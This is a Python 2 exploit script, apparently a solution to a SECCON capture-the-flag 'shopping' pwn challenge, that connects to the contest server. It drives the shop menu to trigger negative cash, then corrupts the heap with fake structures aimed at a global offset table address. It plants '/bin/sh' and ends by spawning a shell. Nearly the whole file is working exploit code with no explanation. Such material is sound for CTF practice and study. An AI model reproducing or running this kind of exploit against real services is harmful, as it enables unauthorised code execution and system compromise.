import time
import phun

have_neg = False
class R(phun.Remote):

    def choose(self,nr):
        self.read(': ')
        self.sendline(str(nr))

    def bug_report(self,n,b):
        self.read('#\n')
        self.read(': ')
        self.write(n)
        self.read(': ')
        self.write(b)
        self.read("\n")
        
    def shop(self,cmd,*args):
        global have_neg
        self.choose(1)
        n = self.read(1)
        if n == 'W':
            print '[+] got negative cash'
            have_neg = True
            self.sendline('y')
            self.bug_report(*args)
            ## bug report
        self.choose(cmd)

    def add_product(self,*args):
        self.shop(1)
        for x in args:
            self.read('>> ');self.sendline(x)
        self
        self.choose(0)

    def list_product(self):
        self.shop(2)
        self.read('&\n')
        while True:
            x=self.read('\n')
            if 'LIST DONE' in x:
                break
            yield x
            
        self.choose(0)
    def free_product(self):
        self.shop(3)
        self.choose(0)
        
    def bugrep_show(self,n=None,b=None):
        self.choose(-1)
        if self.read(1) == 'N':
            return None
        
        self.read('#\n')
        ret=self.read(')\n')
        self.read('>> ')
        if n:
            self.sendline('y')
            self.read(': ')
            self.write(n)
        else:
            self.sendline('n')
        self.read('>> ')
        time.sleep(5)
        if b:
            self.sendline('Y\n')
            self.read(': ')
            self.write(b)
        else:
            self.sendline('n')
        return ret

    def cart_add(self,n,x):
        self.choose(2)
        self.choose(1)
        self.read('>> ')
        self.sendline(n)
        self.read('>> ')
        self.sendline(str(x))
        self.choose(0)

    def buy(self):
        self.choose(2)
        self.choose(3)
        self.read('.')
        self.choose(0)

#r = R('localhost',1234)
def run(off): 
    r = R('shopping.pwn.seccon.jp',16294)
    r.add_product('a','1073741824','1073741824')
    r.cart_add('a',1)
    r.buy()
    r.cart_add('a',1)
    r.buy()
    r.cart_add('a',1)

    r.shop(0,'a','A'*42  + phun.p64(off+1) + "\n")
    #r.shop(0,'asdf\n','A'*42 + phun.p64(0x1a1) + "\n")

    ## some fake products
    r.add_product('asdfasd1','0','1000000')
    r.add_product('asdfasd2','0','1000000')
    r.add_product('asdfasdf','0','1000000')
    r.cart_add('asdfasdf',0x42180)
    r.add_product('\x01'*8,'0','1000000')
    r.add_product('/bin/sh','0','0')
    print '[+] heap setted up'
    
    fake_struct = phun.p64(0x603018  - 0x10,0x3be20,0) 
    fake_struct = phun.p64(0x603018  - 0x10,0x3c770,0) 
    payload = phun.p64(0x400007)*28 + fake_struct + '\n'
    payload = "X"*((off - 80)) + fake_struct +"\n"
    print '[*] payload size', hex(len(payload))
    #raw_input('x')
    r.bugrep_show(n=payload)
    try:
        r.buy()
        r.read(':');r.read(':')
        print '[*] shellz?'
        r.shop(3)
        r.shell()
    except:
        pass
#for i in range(100):
#    while not run(160 + i*8):pass
run(0x190)